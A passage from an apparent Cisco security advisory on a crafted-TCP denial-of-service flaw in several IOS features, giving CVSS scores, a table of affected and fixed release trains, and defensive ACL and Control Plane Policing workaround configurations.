Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsr29468: Cisco IOS Software Multiple Features Crafted TCP Sequence
Vulnerability
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
=====
Successful exploitation of this vulnerability will cause the device
to reload. Repeated attempts to exploit this vulnerability could
result in a sustained DoS condition.
Software Versions and Fixes
==========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the Cisco IOS software table (below) names a Cisco IOS
release train. If a given release train is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. The "Recommended
Release" column indicates the releases which have fixes for all the
published vulnerabilities at the time of this Advisory. A device
running a release in the given train that is earlier than the release
in a specific column (less than the First Fixed Release) is known to
be vulnerable. Cisco recommends upgrading to a release equal to or
later than the release in the "Recommended Releases" column of the
table.
+-------------------------------------------------------------------+
| Major | Availability of Repaired Releases |
| Release | |
|------------+------------------------------------------------------|
| Affected | | |
| 12.0-Based | First Fixed Release | Recommended Release |
| Releases | | |
|-------------------------------------------------------------------|
| There are no affected 12.0 based releases |
|-------------------------------------------------------------------|
| Affected | | |
| 12.1-Based | First Fixed Release | Recommended Release |
| Releases | | |
|-------------------------------------------------------------------|
| There are no affected 12.1 based releases |
|-------------------------------------------------------------------|
| Affected | | |
| 12.2-Based | First Fixed Release | Recommended Release |
| Releases | | |
|------------+-----------------------------+------------------------|
| 12.2 | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2B | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2BC | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2BW | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2BX | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2BY | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2BZ | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2CX | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2CY | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2CZ | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2DA | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2DD | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2DX | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2EW | Vulnerable; first fixed in | 12.2(31)SGA9 |
| | 12.2SG | |
|------------+-----------------------------+------------------------|
| 12.2EWA | Vulnerable; first fixed in | 12.2(31)SGA9 |
| | 12.2SG | |
|------------+-----------------------------+------------------------|
| | Releases prior to 12.2(44) | |
| | EX are vulnerable, release | |
| 12.2EX | 12.2(44)EX and later are | 12.2(44)SE6 |
| | not vulnerable; first fixed | |
| | in 12.2SE | |
|------------+-----------------------------+------------------------|
| 12.2EY | 12.2(44)EY | 12.2(44)SE6 |
|------------+-----------------------------+------------------------|
| 12.2EZ | Vulnerable; first fixed in | 12.2(44)SE6 |
| | 12.2SE | |
|------------+-----------------------------+------------------------|
| 12.2FX | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2FY | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2FZ | Vulnerable; first fixed in | 12.2(44)SE6 |
| | 12.2SE | |
|------------+-----------------------------+------------------------|
| | Vulnerable; first fixed in | 12.2(33)SRC4; |
| 12.2IRA | 12.2SRC | Available on |
| | | 18-MAY-2009 |
|------------+-----------------------------+------------------------|
| | Vulnerable; first fixed in | 12.2(33)SRC4; |
| 12.2IRB | 12.2SRC | Available on |
| | | 18-MAY-2009 |
|------------+-----------------------------+------------------------|
| 12.2IXA | Vulnerable; migrate to any | 12.2(18)IXH; Available |
| | release in 12.2IXH | on 31-MAR-2009 |
|------------+-----------------------------+------------------------|
| 12.2IXB | Vulnerable; migrate to any | 12.2(18)IXH; Available |
| | release in 12.2IXH | on 31-MAR-2009 |
|------------+-----------------------------+------------------------|
| 12.2IXC | Vulnerable; migrate to any | 12.2(18)IXH; Available |
| | release in 12.2IXH | on 31-MAR-2009 |
|------------+-----------------------------+------------------------|
| 12.2IXD | Vulnerable; migrate to any | 12.2(18)IXH; Available |
| | release in 12.2IXH | on 31-MAR-2009 |
|------------+-----------------------------+------------------------|
| 12.2IXE | Vulnerable; migrate to any | 12.2(18)IXH; Available |
| | release in 12.2IXH | on 31-MAR-2009 |
|------------+-----------------------------+------------------------|
| 12.2IXF | Vulnerable; migrate to any | 12.2(18)IXH; Available |
| | release in 12.2IXH | on 31-MAR-2009 |
|------------+-----------------------------+------------------------|
| 12.2IXG | Vulnerable; migrate to any | 12.2(18)IXH; Available |
| | release in 12.2IXH | on 31-MAR-2009 |
|------------+-----------------------------+------------------------|
| 12.2JA | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2JK | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2MB | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2MC | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2S | Vulnerable; first fixed in | 12.2(33)SB4 |
| | 12.2SB | |
|------------+-----------------------------+------------------------|
| | 12.2(33)SB3 | |
| | | |
| 12.2SB | 12.2(28)SB13 | 12.2(33)SB4 |
| | | |
| | 12.2(31)SB14 | |
|------------+-----------------------------+------------------------|
| 12.2SBC | Vulnerable; first fixed in | 12.2(33)SB4 |
| | 12.2SB | |
|------------+-----------------------------+------------------------|
| 12.2SCA | Vulnerable; first fixed in | 12.2(33)SCB1 |
| | 12.2SCB | |
|------------+-----------------------------+------------------------|
| 12.2SCB | 12.2(33)SCB1 | 12.2(33)SCB1 |
|------------+-----------------------------+------------------------|
| | 12.2(46)SE2 | |
| | | |
| 12.2SE | 12.2(50)SE | 12.2(44)SE6 |
| | | |
| | 12.2(44)SE5 | |
|------------+-----------------------------+------------------------|
| 12.2SEA | Vulnerable; first fixed in | 12.2(44)SE6 |
| | 12.2SE | |
|------------+-----------------------------+------------------------|
| 12.2SEB | Vulnerable; first fixed in | 12.2(44)SE6 |
| | 12.2SE | |
|------------+-----------------------------+------------------------|
| 12.2SEC | Vulnerable; first fixed in | 12.2(44)SE6 |
| | 12.2SE | |
|------------+-----------------------------+------------------------|
| 12.2SED | Vulnerable; first fixed in | 12.2(44)SE6 |
| | 12.2SE | |
|------------+-----------------------------+------------------------|
| 12.2SEE | Vulnerable; first fixed in | 12.2(44)SE6 |
| | 12.2SE | |
|------------+-----------------------------+------------------------|
| 12.2SEF | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| | Releases prior to 12.2(25) | |
| | SEG4 are vulnerable, | |
| 12.2SEG | release 12.2(25)SEG4 and | 12.2(44)SE6 |
| | later are not vulnerable; | |
| | first fixed in 12.2SE | |
|------------+-----------------------------+------------------------|
| 12.2SG | 12.2(50)SG | 12.2(52)SG; Available |
| | | on 15-MAY-2009 |
|------------+-----------------------------+------------------------|
| 12.2SGA | 12.2(31)SGA9 | 12.2(31)SGA9 |
|------------+-----------------------------+------------------------|
| 12.2SL | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2SM | Vulnerable; contact TAC | |
|------------+-----------------------------+------------------------|
| 12.2SO | Vulnerable; contact TAC | |
|------------+-----------------------------+------------------------|
| 12.2SQ | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| | Vulnerable; first fixed in | 12.2(33)SRC4; |
| 12.2SRA | 12.2SRC | Available on |
| | | 18-MAY-2009 |
|------------+-----------------------------+------------------------|
| | | 12.2(33)SRB5a; |
| | | Available on |
| 12.2SRB | Vulnerable; first fixed in | 3-April-2009 12.2(33) |
| | 12.2SRC | SRC4; Available on |
| | | 18-MAY-2009 12.2(33) |
| | | SRD1 |
|------------+-----------------------------+------------------------|
| | | 12.2(33)SRC4; |
| 12.2SRC | 12.2(33)SRC3 | Available on |
| | | 18-MAY-2009 12.2(33) |
| | | SRD1 |
|------------+-----------------------------+------------------------|
| 12.2SRD | 12.2(33)SRD1 | 12.2(33)SRD1 |
|------------+-----------------------------+------------------------|
| 12.2STE | Vulnerable; contact TAC | |
|------------+-----------------------------+------------------------|
| 12.2SU | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2SV | Vulnerable; contact TAC | |
|------------+-----------------------------+------------------------|
| 12.2SVA | Vulnerable; contact TAC | |
|------------+-----------------------------+------------------------|
| 12.2SVC | Vulnerable; contact TAC | |
|------------+-----------------------------+------------------------|
| 12.2SVD | Vulnerable; contact TAC | |
|------------+-----------------------------+------------------------|
| 12.2SVE | Vulnerable; contact TAC | |
|------------+-----------------------------+------------------------|
| 12.2SW | Vulnerable; migrate to any | |
| | release in 12.4SW | |
|------------+-----------------------------+------------------------|
| 12.2SX | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2SXA | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2SXB | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2SXD | Vulnerable; first fixed in | 12.2(18)SXF16 |
| | 12.2SXF | |
|------------+-----------------------------+------------------------|
| 12.2SXE | Vulnerable; first fixed in | 12.2(18)SXF16 |
| | 12.2SXF | |
|------------+-----------------------------+------------------------|
| 12.2SXF | 12.2(18)SXF16 | 12.2(18)SXF16 |
|------------+-----------------------------+------------------------|
| | 12.2(33)SXH5; Available on | 12.2(33)SXH5; |
| 12.2SXH | 20-APR-2009 | Available on |
| | | 20-APR-2009 |
|------------+-----------------------------+------------------------|
| 12.2SXI | 12.2(33)SXI1 | 12.2(33)SXI1 |
|------------+-----------------------------+------------------------|
| 12.2SY | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2SZ | Vulnerable; first fixed in | 12.2(33)SB4 |
| | 12.2SB | |
|------------+-----------------------------+------------------------|
| 12.2T | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2TPC | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XA | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XB | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XC | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XD | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XE | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XF | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XG | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XH | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XI | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XJ | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XK | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XL | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XM | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| | Vulnerable; first fixed in | 12.2(33)SB4 |
| 12.2XN | 12.2SRC | |
| | | 12.2(33)SRD1 |
|------------+-----------------------------+------------------------|
| 12.2XNA | Vulnerable; first fixed in | 12.2(33)SRD1 |
| | 12.2SRD | |
|------------+-----------------------------+------------------------|
| 12.2XNB | 12.2(33)XNB1 | 12.2(33)XNB3 |
|------------+-----------------------------+------------------------|
| 12.2XNC | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XO | 12.2(46)XO | 12.2(46)XO |
|------------+-----------------------------+------------------------|
| 12.2XQ | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XR | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XS | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XT | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XU | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XV | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2XW | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YA | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YB | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YC | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YD | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YE | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YF | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YG | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YH | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YJ | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YK | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YL | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YM | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YN | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YO | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YP | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YQ | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YR | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YS | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YT | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YU | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YV | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YW | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YX | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YY | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2YZ | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2ZA | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2ZB | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2ZC | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2ZD | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2ZE | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2ZF | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2ZG | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2ZH | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2ZJ | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2ZL | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.2ZP | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| | Vulnerable; first fixed in | 12.2(33)SXH5; |
| 12.2ZU | 12.2SXH | Available on |
| | | 20-APR-2009 |
|------------+-----------------------------+------------------------|
| 12.2ZX | Vulnerable; first fixed in | 12.2(33)SB4 |
| | 12.2SB | |
|------------+-----------------------------+------------------------|
| 12.2ZY | Vulnerable; contact TAC | |
|------------+-----------------------------+------------------------|
| 12.2ZYA | 12.2(18)ZYA1 | 12.2(18)ZYA1 |
|------------+-----------------------------+------------------------|
| Affected | | |
| 12.3-Based | First Fixed Release | Recommended Release |
| Releases | | |
|-------------------------------------------------------------------|
| There are no affected 12.3 based releases |
|-------------------------------------------------------------------|
| Affected | | |
| 12.4-Based | First Fixed Release | Recommended Release |
| Releases | | |
|------------+-----------------------------+------------------------|
| 12.4 | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4JA | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4JDA | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4JK | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4JL | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4JMA | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4JMB | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4JX | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| | 12.4(15)MD2 | |
| | | |
| 12.4MD | Releases prior to 12.4(11) | 12.4(11)MD7 |
| | MD6 are not vulnerable, | |
| | releases 12.4(15)MD and | |
| | later are vulnerable. | |
|------------+-----------------------------+------------------------|
| | 12.4(19)MR1 | |
| | | |
| 12.4MR | Releases prior to 12.4(16) | 12.4(19)MR2 |
| | MR2 are not vulnerable, | |
| | releases 12.4(19)MR and | |
| | later are vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4SW | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| | 12.4(22)T | |
| | | 12.4(22)T1 |
| 12.4T | 12.4(20)T2 | |
| | | 12.4(15)T9; Available |
| | Releases prior to 12.4(20)T | on 29-APR-2009 |
| | are NOT vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4XA | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4XB | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4XC | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4XD | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4XE | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4XF | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4XG | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4XJ | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4XK | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4XL | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4XM | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4XN | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4XP | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4XQ | 12.4(15)XQ2 | 12.4(15)XQ2 |
|------------+-----------------------------+------------------------|
| | | 12.4(22)T1 |
| 12.4XR | 12.4(15)XR4 | |
| | | 12.4(15)T9; Available |
| | | on 29-APR-2009 |
|------------+-----------------------------+------------------------|
| 12.4XT | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4XV | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4XW | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| | | 12.4(22)T1 |
| 12.4XY | 12.4(15)XY4 | |
| | | 12.4(15)T9; Available |
| | | on 29-APR-2009 |
|------------+-----------------------------+------------------------|
| 12.4XZ | 12.4(15)XZ2 | 12.4(15)XZ2 |
|------------+-----------------------------+------------------------|
| 12.4YA | 12.4(20)YA2 | 12.4(20)YA3 |
|------------+-----------------------------+------------------------|
| 12.4YB | Not Vulnerable | |
|------------+-----------------------------+------------------------|
| 12.4YD | Not Vulnerable | |
+-------------------------------------------------------------------+
Workarounds
==========
The following mitigations have been identified for this
vulnerability, which may help protect an infrastructure until an
upgrade to a fixed version of Cisco IOS software can be scheduled:
Infrastructure Access Control Lists
+----------------------------------
Although it is often difficult to block traffic that transits a
network, it is possible to identify traffic that should never be
allowed to target infrastructure devices and block that traffic at
the border of networks. Infrastructure Access Control Lists (iACLs)
are a network security best practice and should be considered as a
long-term addition to good network security as well as a workaround
for these specific vulnerabilities. The iACL example below should be
included as part of the deployed infrastructure access-list which
will protect all devices with IP addresses in the infrastructure IP
address range:
!---
!--- Only sections pertaining to features enabled on the device
!--- need be configured.
!---
!--- Feature: ALPS
!---
access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
INFRASTRUCTURE_ADDRESSES WILDCARD eq 350
access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
INFRASTRUCTURE_ADDRESSES WILDCARD eq 10000
!---
!--- Deny ALPS TCP traffic from all other sources destined
!--- to infrastructure addresses.
!---
access-list 150 deny tcp any
INFRASTRUCTURE_ADDRESSES WILDCARD eq 350
access-list 150 deny tcp any
INFRASTRUCTURE_ADDRESSES WILDCARD eq 10000
!---
!--- Feature: STUN
!---
access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
INFRASTRUCTURE_ADDRESSES WILDCARD eq 1994
access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
INFRASTRUCTURE_ADDRESSES WILDCARD range 1990 1992
!---
!--- Deny STUN TCP traffic from all other sources destined
!--- to infrastructure addresses.
!---
access-list 150 deny tcp any
INFRASTRUCTURE_ADDRESSES WILDCARD eq 1994
access-list 150 deny tcp any
INFRASTRUCTURE_ADDRESSES WILDCARD range 1990 1992
!---
!--- Feature: BSTUN
!---
access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
INFRASTRUCTURE_ADDRESSES WILDCARD eq 1963
access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
INFRASTRUCTURE_ADDRESSES WILDCARD range 1976 1979
!---
!--- Deny BSTUN TCP traffic from all other sources destined
!--- to infrastructure addresses.
!---
access-list 150 deny tcp any
INFRASTRUCTURE_ADDRESSES WILDCARD eq 1963
access-list 150 deny tcp any
INFRASTRUCTURE_ADDRESSES WILDCARD range 1976 1979
!---
!--- Feature: NCIA
!---
!---
!--- Leverage the underlying protocols, DLSw, RSRB, etc.
!---
!---
!--- Feature: DLSW
!---
access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
INFRASTRUCTURE_ADDRESSES WILDCARD eq 2065
access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
INFRASTRUCTURE_ADDRESSES WILDCARD eq 2067
access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
INFRASTRUCTURE_ADDRESSES WILDCARD range 1981 1983
!---
!--- Deny DLSW TCP traffic from all other sources destined
!--- to infrastructure addresses.
!---
access-list 150 deny tcp any
INFRASTRUCTURE_ADDRESSES WILDCARD eq 2065
access-list 150 deny tcp any
INFRASTRUCTURE_ADDRESSES WILDCARD eq 2067
access-list 150 deny tcp any
INFRASTRUCTURE_ADDRESSES WILDCARD range 1981 1983
!---
!--- Feature: RSRB
!---
access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
INFRASTRUCTURE_ADDRESSES WILDCARD range 1987 1989
access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
INFRASTRUCTURE_ADDRESSES WILDCARD eq 1996
!---
!--- Deny RSRB TCP traffic from all other sources destined
!--- to infrastructure addresses.
!---
access-list 150 deny tcp any
INFRASTRUCTURE_ADDRESSES WILDCARD range 1987 1989
access-list 150 deny tcp any
INFRASTRUCTURE_ADDRESSES WILDCARD eq 1996
!---
!--- Feature: PPTP
!---
access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
INFRASTRUCTURE_ADDRESSES WILDCARD eq 1723
!---
!--- Deny PPTP TCP traffic from all other sources destined
!--- to infrastructure addresses.
!---
access-list 150 deny tcp any
INFRASTRUCTURE_ADDRESSES WILDCARD eq 1723
!---
!--- Feature: RBP
!---
!--- RBP will listen for TCP connections on the configured port
!--- as per "local port <port_number>". The following example
!--- uses port 1055
!---
access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
INFRASTRUCTURE_ADDRESSES WILDCARD eq 1055
!---
!--- Deny RBP traffic from all other sources destined
!--- to infrastructure addresses.
!---
access-list 150 deny tcp any
INFRASTRUCTURE_ADDRESSES WILDCARD eq 1055
!---
!--- Feature: XOT and X.25 Routing
!---
access-list 150 permit tcp TRUSTED_HOSTS WILDCARD
INFRASTRUCTURE_ADDRESSES WILDCARD eq 1998
!---
!--- Deny XOT and X25 TCP traffic from all other sources
!--- destined to infrastructure addresses.
!---
access-list 150 deny tcp any
INFRASTRUCTURE_ADDRESSES WILDCARD eq 1998
!---
!--- Permit/deny all other Layer 3 and Layer 4 traffic in
!--- accordance with existing security policies and
!--- configurations Permit all other traffic to transit the
!--- device.
!---
access-list 150 permit ip any any
!---
!--- Apply access-list to all interfaces (only one example
!--- shown)
!---
interface serial 2/0
ip access-group 150 in
The white paper entitled "Protecting Your Core: Infrastructure
Protection Access Control Lists" presents guidelines and recommended
deployment techniques for infrastructure protection access lists.
This white paper can be obtained at the following link:
http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801a1a55.shtml
Receive ACLs (rACL)
+------------------
For distributed platforms, Receive ACLs may be an option starting in
Cisco IOS Software Versions 12.0(21)S2 for the 12000 (GSR), 12.0(24)S
for the 7500, and 12.0(31)S for the 10720. The Receive ACL protects
the device from harmful traffic before the traffic can impact the
route processor. Receive ACLs are designed to only protect the device
on which it is configured. On the 12000, 7500, and 10720, transit
traffic is never affected by a receive ACL. Because of this, the
destination IP address "any" used in the example ACL entries below
only refer to the router's own physical or virtual IP addresses.
Receive ACLs are considered a network security best practice, and
should be considered as a long-term addition to good network
security, as well as a workaround for this specific vulnerability.
The white paper entitled "Protecting Your Core: Infrastructure
Protection Access Control Lists" presents guidelines and recommended
deployment techniques for infrastructure protection access lists.
This white paper can be obtained at the following link
http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801a0a5e.shtml
The following is the receive path ACL written to permit this type of
traffic from trusted hosts:
!---
!--- Only sections pertaining to features enabled on the device
!--- need be configured.
!---
!---
!--- Permit ALPS traffic from trusted hosts allowed to the RP.
!---
access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
any eq 350
access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
any eq 10000
!---
!--- Deny ALPS traffic from all other sources to the RP.
!---
access-list 150 deny tcp any any eq 350
access-list 150 deny tcp any any eq 10000
!---
!--- Permit STUN traffic from trusted hosts allowed to the RP.
!---
access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
any eq 1994
access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
any range 1990 1992
!---
!--- Deny STUN traffic from all other sources to the RP.
!---
access-list 150 deny tcp any any eq 1994
access-list 150 deny tcp any any eq range 1990 1992
!---
!--- Permit BSTUN traffic from trusted hosts allowed to the RP.
!---
access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
any eq 1963
access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
any range 1976 1979
!---
!--- Deny BSTUN traffic from all other sources to the RP.
!---
access-list 150 deny tcp any any eq 1963
access-list 150 deny tcp any any eq range 1976 1979
!---
!--- Permit DLSw from trusted hosts allowed to the RP.
!---
access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
any eq 2065
access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
any eq 2067
access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
any range 1981 1983
!---
!--- Deny DLSw all other sources to the RP.
!---
access-list 150 deny tcp any any eq 2065
access-list 150 deny tcp any any eq 2067
access-list 150 deny tcp any any range 1981 1983
!---
!--- Permit RSRB traffic from trusted hosts allowed to the RP.
!---
access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
any eq 1996
access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
any range 1987 1989
!---
!--- Deny RSRB traffic from all other sources to the RP.
!---
access-list 150 deny tcp any any eq 1996
access-list 150 deny tcp any any range 1987 1989
!---
!--- Permit PPTP traffic from trusted hosts allowed to the RP.
!---
access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
any eq 1723
!---
!--- Deny PPTP traffic from all other sources to the RP.
!---
access-list 150 deny tcp any any eq 1723
!---
!--- Permit RBP traffic from trusted hosts allowed to the RP.
!--- RBP will listen for TCP connections on the configured port
!--- as per "local port <port_number>". The following example
!--- uses port 1055
!---
access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
any eq 1055
!---
!--- Deny RBP traffic from all other sources to the RP.
!---
access-list 150 deny tcp any any eq 1055
!---
!--- Permit XOT and X.25 Routing traffic from trusted hosts allowed
!--- to the RP.
!---
access-list 150 permit tcp TRUSTED_SOURCE_ADDRESSES WILDCARD
any eq 1998
!---
!--- Deny XOT and X.25 Routing traffic from all other sources to
!--- the RP.
!---
access-list 150 deny tcp any any eq 1998
!--- Permit all other traffic to the RP.
!--- according to security policy and configurations.
access-list 150 permit ip any any
!--- Apply this access list to the 'receive' path.
ip receive access-list 150
Control Plane Policing
+---------------------
Control Plane Policing (CoPP) can be used to block the affected
features TCP traffic access to the device. Cisco IOS software
releases 12.0S, 12.2SX, 12.2S, 12.3T, 12.4, and 12.4T support the
CoPP feature. CoPP can be configured on a device to protect the
management and control planes and minimize the risk and effectiveness
of direct infrastructure attacks by explicitly permitting only
authorized traffic that is sent to infrastructure devices in
accordance with existing security policies and configurations. The
CoPP example below should be included as part of the deployed CoPP
that will protect all devices with IP addresses in the infrastructure
IP address range.
!---
!--- Only sections pertaining to features enabled on the device
!--- need be configured.
!---
!--- Feature: ALPS
!---
access-list 150 deny tcp TRUSTED_HOSTS WILDCARD any eq 350
access-list 150 deny tcp TRUSTED_HOSTS WILDCARD any eq 10000
!---
!--- Permit ALPS traffic sent to all IP addresses
!--- configured on all interfaces of the affected device so
